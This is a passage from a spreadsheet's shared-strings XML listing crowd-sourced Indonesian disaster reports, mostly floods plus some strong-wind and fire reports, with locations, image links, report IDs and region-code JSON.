    <t>Rumah ambruk milik Ibu Marsilah akibat Angin Kencang, Dsn.Sukajadi 02/02 Ds.Purbahayu Kec.Pangandaran. Lokasi masih dibersihkan oleh BPBD.</t>
  </si>
  <si>
    <t>Purbahayu</t>
  </si>
  <si>
    <t>Pangandaran</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/V9s_3BmlikRec7CoRapnW5zI0aa2SvPE5McNBTLDtUS0aGFvb42XHlIdivGx5pj17GOg22umjbP9ir0aUwygnEnOuXbimMFrdL4hc2wt3js=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2491", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil ini tolong diuruk, tiap hujan selalu tergenang, membahayakan pengguna motor</t>
  </si>
  <si>
    <t>e776b37f-a311-4b38-898c-b6654e910dc4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e776b37f-a311-4b38-898c-b6654e910dc4.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 168.691582, "fireLocation": { "lat": -6.604899, "lng": 106.795706 }, "personLocation": { "lat": -6.604830, "lng": 106.795022 }, "fireRadius": { "lat": -6.604843, "lng": 106.794180 } }</t>
  </si>
  <si>
    <t>Kebakaran pada BTM bogor pada tanggal 31/1/21</t>
  </si>
  <si>
    <t>Bogor Tengah</t>
  </si>
  <si>
    <t>30c52515-e430-44ad-8115-d160ae003fc8</t>
  </si>
  <si>
    <t>https://images.petabencana.id/30c52515-e430-44ad-8115-d160ae003fc8.jpg</t>
  </si>
  <si>
    <t>Banjir pada Kalimantan Selatan</t>
  </si>
  <si>
    <t>1b173423-427b-4712-9acd-32050ada96f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1b173423-427b-4712-9acd-32050ada96f9.jpg</t>
  </si>
  <si>
    <t>Banjir di Kalimantan Selatan</t>
  </si>
  <si>
    <t>6dfb1319-a01b-4da5-8756-c880d475de78</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6dfb1319-a01b-4da5-8756-c880d475de78.jpg</t>
  </si>
  <si>
    <t>Banjir di daerah Sidoarjo Jawa timur</t>
  </si>
  <si>
    <t>b98f81a0-a943-4382-8a47-51b2c0e2da0a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b98f81a0-a943-4382-8a47-51b2c0e2da0a.jpg</t>
  </si>
  <si>
    <t>Banjir di daerah sumatera</t>
  </si>
  <si>
    <t>Aek Unsin</t>
  </si>
  <si>
    <t>Borbor</t>
  </si>
  <si>
    <t>Toba Samosir</t>
  </si>
  <si>
    <t>c99be685-0191-4994-b7a4-31eeb84b87fd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c99be685-0191-4994-b7a4-31eeb84b87fd.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 210.242383, "fireLocation": { "lat": -6.604870, "lng": 106.795566 }, "personLocation": { "lat": -6.604755, "lng": 106.795062 }, "fireRadius": { "lat": -6.604790, "lng": 106.793665 } }</t>
  </si>
  <si>
    <t>Sulit bernafas</t>
  </si>
  <si>
    <t>eb934667-926c-4396-bcb9-199824c12f60</t>
  </si>
  <si>
    <t>https://images.petabencana.id/eb934667-926c-4396-bcb9-199824c12f60.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 143.741845, "fireLocation": { "lat": -6.604904, "lng": 106.795427 }, "personLocation": { "lat": -6.604878, "lng": 106.795175 }, "fireRadius": { "lat": -6.604939, "lng": 106.794126 } }</t>
  </si>
  <si>
    <t>c298a684-0217-466b-874e-37c2af228a11</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c298a684-0217-466b-874e-37c2af228a11.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 181.641837, "fireLocation": { "lat": -6.604931, "lng": 106.795727 }, "personLocation": { "lat": -6.604896, "lng": 106.795151 }, "fireRadius": { "lat": -6.604960, "lng": 106.794083 } }</t>
  </si>
  <si>
    <t>Sulit bernafas dan melihat</t>
  </si>
  <si>
    <t>cbcd376e-dfde-4453-96f4-f7dd7efed6bf</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cbcd376e-dfde-4453-96f4-f7dd7efed6bf.jpg</t>
  </si>
  <si>
    <t>Bencana alam ini yg terjadi pada bulan Januari, tepatnya terjadi di Kalimantan Selatan</t>
  </si>
  <si>
    <t>46248475-37d3-4630-a645-fb66d8e3692a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/46248475-37d3-4630-a645-fb66d8e3692a.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi pada bulan Januari di Kalimantan barat</t>
  </si>
  <si>
    <t>b543e9cd-2b98-4a01-a34f-dfa59660fcfd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b543e9cd-2b98-4a01-a34f-dfa59660fcfd.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 167.513105, "fireLocation": { "lat": -6.604891, "lng": 106.795365 }, "personLocation": { "lat": -6.604838, "lng": 106.795126 }, "fireRadius": { "lat": -6.604726, "lng": 106.793858 } }</t>
  </si>
  <si>
    <t>37627ae2-f070-4348-a8cf-2e0cc6bc6a39</t>
  </si>
  <si>
    <t>https://images.petabencana.id/37627ae2-f070-4348-a8cf-2e0cc6bc6a39.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "fire", "fireDistance": 204.013731, "fireLocation": { "lat": -6.604915, "lng": 106.795231 }, "personLocation": { "lat": -6.605014, "lng": 106.795363 }, "fireRadius": { "lat": -6.604992, "lng": 106.793386 } }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/5_Fs5ns66vNDHW6L6i7-g6aenhLTBHSwP662slyEpt28Sov15nm82lkEGKQGRMBq-swsA_oqxFMsqeL9usWf2UdvW-tVaWIYE_DyrOHyqIo=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #KaliMeluap Tolong perbaiki &amp; lebarkan drainase</t>
  </si>
  <si>
    <t>a8552c76-96e4-4752-a601-2fe94c961c8b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a8552c76-96e4-4752-a601-2fe94c961c8b.jpg</t>
  </si>
  <si>
    <t>banjir tadi malam jembatan2 tersumbat pohon tumbang bongkahan bambu mengakibatkan jembatan tersumbat dan air meluap ke permukiman warga dan</t>
  </si>
  <si>
    <t>Bareng</t>
  </si>
  <si>
    <t>86770c09-aad3-4c36-a7d8-17ef67657110</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1448", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Angin kencang</t>
  </si>
  <si>
    <t>c09f374e-f085-405e-947e-5a677f429f8b</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/USqBBz4mjgJYK_ge-aatPZ-ZEnd8Kv35zkjwzJSikzrQd73RqBEumBQkpZowPCFRlJx94J3z5UhwNho00-k312fTnoOvOdpL_K5I6-LhoNU=s480-c</t>
  </si>
  <si>
    <t>banjiiir, jl.cidodol raya, komp loka permai, grosel keb lama jaksel</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357557</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/03/357557-1612307882872718240.mp4-03.jpg</t>
  </si>
  <si>
    <t>Buruknya Drainase Buat Pertigaaan Pasar Rau Serang Banjir</t>
  </si>
  <si>
    <t>Banjir di Cinanggung pertigaan Pasar Rau Kota SERANG - BANTEN, akibat buruknya saluran drainase. Sampai kapankah pertigaan Pasar Rau akan seperti ini, mohon pihak terkait untuk menangani permasalahan ini.</t>
  </si>
  <si>
    <t>Kaligandu</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/545gau8bWlDtiH_xoHSUdUOoNnyqyqPsXCJoiRJJ7ZvmROBVeuH6M4YbRvdXu24PPfWzr6eG4YJUcj42txTdgXGlJXhmh8_IPI6FjJuUnQ=s480-c</t>
  </si>
  <si>
    <t>banjir wilayah Jl. Tlk. Permata 14 No.12, RT.13/RW.15, Pejagalan, Kec. Penjaringan, Kota Jkt Utara, Daerah Khusus Ibukota Jakarta 14450 komplek taman permata indah 2 rt 010 rw 015</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/JWiH_hyw1Ml4TVfdX6eMlP_Y1q6hd4VyyxbC6dCV78tj5zt2gIcPN68CFB-lRa-4CReu4EXJUJsdpzSnimt65QDGMChyItae_gN790NREA=s480-c</t>
  </si>
  <si>
    <t>Pak lurah,  jln gang ini harus di tinggikan.. krn dari dulu blum pernah...</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/-63G3hwj9Sh6gdnPqdTD5BVwOqpaiqdaxSCZi53XMq2iotm0efEubptBPt4lEgeEFUqsD_1M4fEjUCQ9ax_CJp9aes2GE3vSA8pE3OLTrg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1982", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tlg keduk lumpur sekitar jalan mangga pasar lontar deket kantor kecamatan.... sdh lama tdk ada petugas yg keduk lumpur.... sehingga klo hujan lansung terkenang....</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/BEaWuHX-TeDfoWOveMKpHDKnYz67tl40r_dQNQ7DjyXjsyiIGTGdpmreZbFwC3qUdi7rSBqkVWDu3easyvWXP_R_5PDDSOoHuXY1moDu=s480-c</t>
  </si>
  <si>
    <t>saluran air ngga pernah dibongkar dan dibersihkan. setiap hujan pasti banjir. tolong diperhatikan. kelapa hibrida raya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ionIUzp_l4Fx4FoSS3dmdY4TFBhWg9veL1Wa7tmyT4QTg6htLmqnc6HswnqFLfbe_Qw3c24tQ7mQntbPmVzJ8K_DxIEZYtxihoh6VuwM=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap halo pemkab bekasi. perum anastra village beberapa mgg ke belakang terendam banjir. tlg ditindak lanjuti drainase dan saluran airnya</t>
  </si>
  <si>
    <t>Sarimukti</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357573</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/03/357573-16123335442094620106.mp4-03.jpg</t>
  </si>
  <si>
    <t>Jalan Imam Bonjol Cikarang Banjir, Lalin Tersendat</t>
  </si>
  <si>
    <t>Jalan Imam Bonjol, Cikarang Barat, Bekasi tergenang air setinggi 25 cm siang ini. Laju kendaraan melambat dan mengakibatkan lalin jadi tersendat arah Bekasi Kota.</t>
  </si>
  <si>
    <t>Karangsari</t>
  </si>
  <si>
    <t>Cikarang Timur</t>
  </si>
  <si>
    <t>43d7f463-48f5-4b86-b149-1cba787b5a11</t>
  </si>
  <si>
    <t>Sudden high speed wind</t>
  </si>
  <si>
    <t>Pecatu</t>
  </si>
  <si>
    <t>Kuta Selatan</t>
  </si>
  <si>
    <t>95a95eae-1c13-4cf8-a8ea-8ce5ba968470</t>
  </si>
  <si>
    <t>https://images.petabencana.id/95a95eae-1c13-4cf8-a8ea-8ce5ba968470.jpg</t>
  </si>
  <si>
    <t>sungai meluap sampai jembatan tenggelam, salah satu jembatan juga ada yang roboh</t>
  </si>
  <si>
    <t>Kepulungan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/AIlya-9ME2NVgQEg15wZYVFoZOmy_yXe_tpyftWszYGms7-Y2wBOvi61f0lWybtyi5LlCjgHsZNHJHBFdX98-HMFkMjWoIz4swFC5BUA9w=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2348", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil #BanjirKiriman #KaliMeluap Menerjang tpu semper krn saluran air krg memadai. Tolong di tl</t>
  </si>
  <si>
    <t>e20b8edd-e0fb-4f86-804a-e564d501871a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e20b8edd-e0fb-4f86-804a-e564d501871a.jpg</t>
  </si>
  <si>
    <t>Banjir di Kudus Jawa tengah , tepatnya di dk. Tempel desa Kedungdowo dan Ds. Setrokalangan kec. Kaliwungu, ketinggian air mulai 20  - 150cm.</t>
  </si>
  <si>
    <t>Setrokalangan</t>
  </si>
  <si>
    <t>Kaliwungu</t>
  </si>
  <si>
    <t>1d7fcf42-bd77-48d1-8a0a-eb4bf38484c3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1d7fcf42-bd77-48d1-8a0a-eb4bf38484c3.jpg</t>
  </si>
  <si>
    <t>banjir merata di blitar</t>
  </si>
  <si>
    <t>Kanigoro</t>
  </si>
  <si>
    <t>Blitar</t>
  </si>
  <si>
    <t>41b45918-bbc6-48e7-9dd8-1536860850ab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/41b45918-bbc6-48e7-9dd8-1536860850ab.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3326", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir di jalan kaligawer raya Semarang.Jalanan banyak lubang besar dan tertutup banjir sangat membahayakan sepeda motor yg melintas</t>
  </si>
  <si>
    <t>Tambakrejo</t>
  </si>
  <si>
    <t>Gayamsari</t>
  </si>
  <si>
    <t>48ae7244-f6c8-4616-a5ec-90319a6e4375</t>
  </si>
  <si>
    <t>https://images.petabencana.id/48ae7244-f6c8-4616-a5ec-90319a6e4375.jpg</t>
  </si>
  <si>
    <t>Banjir di Perumahan Pondok Lakah RT.002/016 setinggi lutut orang dewasa 30-40cm akibat luapan sungai.</t>
  </si>
  <si>
    <t>e7538f80-ceec-4c0e-96d2-b9720cf8f9c3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e7538f80-ceec-4c0e-96d2-b9720cf8f9c3.jpg</t>
  </si>
  <si>
    <t>Banjir lagi di komplek sangrila indah 2, RT.05/06, kel. Petukangan Selatan, Kec. Pesanggrahan, Jaksel...mohon tindakan dari instansi terkait</t>
  </si>
  <si>
    <t>b83e1b96-14b3-4792-83b1-6aff7c9a2e36</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b83e1b96-14b3-4792-83b1-6aff7c9a2e36.jpg</t>
  </si>
  <si>
    <t>Pondok hijau permai Rawalumbu banjir</t>
  </si>
  <si>
    <t>07d8981c-e73e-4bb3-9faa-f0bd90739a93</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3485", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>itu foto di dalam serumah setengah betis, diluar mungkin hampir 1 lutut</t>
  </si>
  <si>
    <t>7aed9260-6f0c-4f63-a002-ef942abbe09f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7aed9260-6f0c-4f63-a002-ef942abbe09f.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2914", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Kebonagung</t>
  </si>
  <si>
    <t>Semarang Timur</t>
  </si>
  <si>
    <t>45e26281-a672-4a88-aea3-eba26a279984</t>
  </si>
  <si>
    <t>https://images.petabencana.id/45e26281-a672-4a88-aea3-eba26a279984.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3533", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Palebon</t>
  </si>
  <si>
    <t>f077076c-a3ed-42d7-abf7-9d90649032b9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f077076c-a3ed-42d7-abf7-9d90649032b9.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3055", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Semarang Tengah</t>
  </si>
  <si>
    <t>11e565b5-e641-42f5-9420-e7d054c3b8f7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/11e565b5-e641-42f5-9420-e7d054c3b8f7.jpg</t>
  </si>
  <si>
    <t>Banjir 6 Februari 2021 di desa Kebonadem dari meluapnya kali Waridin dan hujan lebat semalam an</t>
  </si>
  <si>
    <t>Kebon Adem</t>
  </si>
  <si>
    <t>Brangsong</t>
  </si>
  <si>
    <t>9e6e9171-6011-4ca7-9110-5d1c0d2f12a0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9e6e9171-6011-4ca7-9110-5d1c0d2f12a0.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3418", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Mangunharjo</t>
  </si>
  <si>
    <t>ac31d17e-cceb-4be3-9d8e-b540fbc6da14</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ac31d17e-cceb-4be3-9d8e-b540fbc6da14.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3039", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Panggung Lor</t>
  </si>
  <si>
    <t>Semarang Utara</t>
  </si>
  <si>
    <t>57f933e6-d12d-43f5-a856-50b6fd0963b8</t>
  </si>
  <si>
    <t>Angin kencang yang ringan dan cuaca yang dingin</t>
  </si>
  <si>
    <t>9a9dccdd-fbda-4594-9cea-f54bf0593612</t>
  </si>
  <si>
    <t>Terjadi banjir yg membuat Kediaman warga sekitar terendam air. Banjir ini disebabkan karena hujan deras yg terjadi beberapa hari kemaren</t>
  </si>
  <si>
    <t>Bandar Kidul</t>
  </si>
  <si>
    <t>01d2f543-e966-4531-8813-d27ab52a8ce2</t>
  </si>
  <si>
    <t>Terjadi banjir yg menyebabkan rumah warga sekitar terendam air. banjir ini disebabkan karena hujan deras yang terjadi beberapa hari kemaren</t>
  </si>
  <si>
    <t>bf88965b-ae46-4485-bada-78bd6090a6b5</t>
  </si>
  <si>
    <t>Angin kencang yang terjadi menghabat aktivitas warga karena pemadaman listrik dan 1 pohon di pinggir jalan</t>
  </si>
  <si>
    <t>Mojopurno</t>
  </si>
  <si>
    <t>Wungu</t>
  </si>
  <si>
    <t>703c6bf5-1bcf-41d9-8fa5-00ef436bab03</t>
  </si>
  <si>
    <t>Banjir kecil disebabkan air brantas naik</t>
  </si>
  <si>
    <t>ad6eb873-c1ae-4283-a35c-90f1cd3cd892</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ad6eb873-c1ae-4283-a35c-90f1cd3cd892.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2940", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Kaligawe</t>
  </si>
  <si>
    <t>beab139a-18e2-40c8-b222-f0cc781e9b7d</t>
  </si>
  <si>
    <t>Banjir selutut orang dewasa dan jalanan tergenang air semua</t>
  </si>
  <si>
    <t>Tambakroto</t>
  </si>
  <si>
    <t>4d63a319-f8da-4300-8662-689eb7a17fb3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4d63a319-f8da-4300-8662-689eb7a17fb3.jpg</t>
  </si>
  <si>
    <t>Hujan semalam dan banjir pekalongan</t>
  </si>
  <si>
    <t>f553b325-f50f-4e71-9e21-fad73bc723f5</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "4074", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir di perumahan muktiharjo kidul</t>
  </si>
  <si>
    <t>a016d655-df53-4525-a935-0c63bdaa2921</t>
  </si>
  <si>
    <t>Banjir di Desa Bandar, Kecamatan Bandarkedungmulyo, Kabupaten Jombang, air mulai meluap dini hari sekitar jam 1, Sabtu 6 Februari 2021</t>
  </si>
  <si>
    <t>Bandar Kedung Mulyo</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357671</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/06/357671-16125953871377735808.mp4-03.jpg</t>
  </si>
  <si>
    <t>Benjir di Desa Karangawen Sudah Memasuki Rumah Warga</t>
  </si>
  <si>
    <t>Banjir di Desa Karangawen Dukuh Waruk Kecamatan Karangawen, dengan ketinggian sekitar 40 cm dan Air sudah mulai memasuki rumah warga.</t>
  </si>
  <si>
    <t>Teluk</t>
  </si>
  <si>
    <t>Karangawen</t>
  </si>
  <si>
    <t>a97977ff-eb8a-418d-84c2-5e465c887a15</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a97977ff-eb8a-418d-84c2-5e465c887a15.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3481", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Untuk pertama kalinya setelah satu dekade depan rumah saya akhirnya banjir setelah diguyur hujan lama sekali.</t>
  </si>
  <si>
    <t>e426c3e8-1100-4ac3-9beb-0fafbd9f360b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e426c3e8-1100-4ac3-9beb-0fafbd9f360b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3528", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Genuksari</t>
  </si>
  <si>
    <t>856fe6c9-7b06-4560-9f0c-39d9393e0583</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3036", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir di daerah tanah mas semarang utara</t>
  </si>
  <si>
    <t>4bdab80f-6335-4dee-82ff-f9f5f354cc0b</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3527", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Di area GunukRata rata banajir. Padahal di banjardowo ada 2 pompa besar knp tadi siang kok g dinyalakan minnnn</t>
  </si>
  <si>
    <t>Banjardowo</t>
  </si>
  <si>
    <t>54bc4bbb-4085-4cb2-ab2f-d995e09456fc</t>
  </si>
  <si>
    <t>https://images.petabencana.id/54bc4bbb-4085-4cb2-ab2f-d995e09456fc.jpg</t>
  </si>
  <si>
    <t>{ "points": 2, "flood_depth": 44, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3463", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir dari wilayah kaligaweraya sampai sepanjang muktiharjo raya.. Mulai dari tadi malam hingga malam ini karena curah hujan yang tinggi."</t>
  </si>
  <si>
    <t>Bangetayu Kulon</t>
  </si>
  <si>
    <t>ac15b1f5-749a-45e6-b4eb-446ed8a59349</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ac15b1f5-749a-45e6-b4eb-446ed8a59349.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "2752", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>daerah petek bedas selatan</t>
  </si>
  <si>
    <t>Dadapsari</t>
  </si>
  <si>
    <t>05d49302-8617-476c-b5fd-26fb30bafa37</t>
  </si>
  <si>
    <t>https://images.petabencana.id/05d49302-8617-476c-b5fd-26fb30bafa37.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "4053", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>Banjir polder muktiharjo kidul sampe meluap</t>
  </si>
  <si>
    <t>c67c40fe-0b5c-45c7-84b0-fc44856430fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c67c40fe-0b5c-45c7-84b0-fc44856430fa.jpg</t>
  </si>
  <si>
    <t>Tidak ada banjir,dan komplek Jaya U Town tidak pernah banjir, tetapi kalau hujan deras jalanan menuju kampus upj rentan terendam genangan ai</t>
  </si>
  <si>
    <t>Sawah</t>
  </si>
  <si>
    <t>32860c13-8964-48cd-b913-f426802d3179</t>
  </si>
  <si>
    <t>https://images.petabencana.id/32860c13-8964-48cd-b913-f426802d3179.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": "3057", "instance_region_code": "ID-JT" }</t>
  </si>
  <si>
    <t>banjir paling besar dan banjir paling lama surut ????</t>
  </si>
  <si>
    <t>Purwodinatan</t>
  </si>
  <si>
    <t>f926ee5b-4d90-4f05-8249-89e89433c07c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f926ee5b-4d90-4f05-8249-89e89433c07c.jpg</t>
  </si>
  <si>
    <t>daerah kota lama</t>
  </si>
  <si>
    <t>6e6a515f-328c-41bf-b9f5-a180f9543a80</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6e6a515f-328c-41bf-b9f5-a180f9543a80.jpg</t>
  </si>
  <si>
    <t>Perumahan Saphire Tirto Samborejo Tirto Pekalongan 51150 - 10 centimeter ya bukan meter</t>
  </si>
  <si>
    <t>Samborejo</t>
  </si>
  <si>
    <t>Tirto</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/B6D18JY95H-5pBN1DYGkJsf6KypCuI-lLgXoYJWX6OETVA3O43hOWp86m3yqC0QYEuqiVftzOzII3fJ997_A7kJa-g5amILIvI2GUczvFA=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Q7bQeT8ldPqIwfPZempBwjelSxiuyqMijqqqrJE34ZPvzFGikM15cZxmMzAEC15vv33vUG5wf02D9bwinZcKs8dRx2sZCB-_HS9JVYkQJA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1675", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Jl. bangun Jaya, kelurahan duren sawit kecamatan duren sawit, tolong pegutas di selidiki penyebab nya! tolong segera di tangani agar warga merasa nyaman</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/NryEmfuKVS_iMo45yPqJuFJTb3uX1xl4HDOZ8PyLER2HZPSjb8eS0f7w5KA-ae2UiCy2RTFyegzRrffb-YrHs59drqe_ei3pk-ox_4YtKA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1793", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil  akibat banyak sampah dan bangunan tanpa izin di atas kali</t>
  </si>
  <si>
    <t>c038945c-c361-4e9b-bd12-0b8e52921de9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c038945c-c361-4e9b-bd12-0b8e52921de9.jpg</t>
  </si>
  <si>
    <t>BANJIR DI JL. CILACAP, MENTENG JAKARTA PUSAT AKIBAT LUAPAN KALI JL. SURABAYA</t>
  </si>
  <si>
    <t>7e213959-ef95-4a60-86c8-f18d621d30bc</t>
  </si>
  <si>
    <t>ya kali hujan2an disuruh foto, diluar rumah dah banjir diatas sebetis, got saluran air ga pernah dibersihin. ga ada koordinasi rt rw, lurah</t>
  </si>
  <si>
    <t>eef7fa92-9f34-485a-b5d6-8f28d30995ca</t>
  </si>
  <si>
    <t>Banjir jalanan depan rumah</t>
  </si>
  <si>
    <t>Setiamulya</t>
  </si>
  <si>
    <t>58bebb34-ff50-4130-ad24-284d9750e9c7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/58bebb34-ff50-4130-ad24-284d9750e9c7.jpg</t>
  </si>
  <si>
    <t>Jalan tergenang 20cm di Kelapa Hibrida VI Kelapa Gading</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/duYIguqiQx3OAztif0NCopnJ6kMs774nCr3FYErcd7DI5rHc9ZEyivcMr0uDpu4P6u3RKrHBnJDmKdCNYST2y9cC7ILS88ZqD5k3mlxDgQ=s480-c</t>
  </si>
  <si>
    <t>baru hujan 15 menit sudah banjir. bagaimana 1 jam mohon perhatian pemerintah kr ke dua ujung jalan tinggi sedang tengah rendah mengakibatkan banjir terlebih dahulu. mohon agar di survey dan menjadi perhatian yg serius</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/UfzJwkxjHfOUZsEMo9M-xP9sr-2o43HoPj6v22WrMdFBx9nmpTEIN6bg2rVwATiXARZzW__bqG7-PBUqikmx1CHzk0eYGZr56sW1FFbU=s480-c</t>
  </si>
  <si>
    <t>komplek taman permata indah 2 rt 010 rw 015 no 12 kel pejagalan kec penjaringan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xsoUWJa2tTMvHL-Jqjuxppg3WXtXMDRNMtHXYkSfsoyaeZFHzuuk0mc0P1bPKiehW148Rjrj66V0tMTFOSceenowXis2ZatHkBQCjOR4zA=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8mp2UFa7LvkbnTI0y18IV5AX0mtxZGprlpGoWNtYs2wzTZZd7hMfax5FdBoyDAnWAUhOSg8e6Zih8EqGci_kDDZwMGslrREC-FmHXyOX=s480-c</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/LQHWLm4wbarogDMa-eNzRXsV7teED6P3x_Udz1x864KFMcDIKWa3X5misnq0teTLinE14QQ7JECVwGHFI3cgzjzJd194-q9bNF0jXf49uQ=s480-c</t>
  </si>
  <si>
    <t>banjir tinggi, harap dipompa segera..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/7WudeeeFipGPHaGbGwtuSSua-ft8utl8xboes4Xv_uDfeRUz0l10w2TyFDQjS8BWX55Zp5kUplbwCLum3W-T2jK63RHXXTOFdOonGIpAlmA=s480-c</t>
  </si>
  <si>
    <t>#SaluranTersumbat #SaluranDitutup</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/yc_9e6aQGFCjppbZZqOna0FeA73aHCmVIk2GeH5DOW-fIYmJ79NngGIQeT3zrp1V3Q_4b8iLYuAYotkFF6eSJM_PBjfdo5s8TGYSC1of6MA=s480-c</t>
  </si>
  <si>
    <t>Mohon bantuan SDA Jakarta barat dgn genangan air di pemukiman padat penduduk di RT 06 RW 06 Kel. Kamal Kec Kalideres Jakarta barat</t>
  </si>
  <si>
    <t>f1b9c766-4e13-41b7-b018-94b47f6efcd0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f1b9c766-4e13-41b7-b018-94b47f6efcd0.jpg</t>
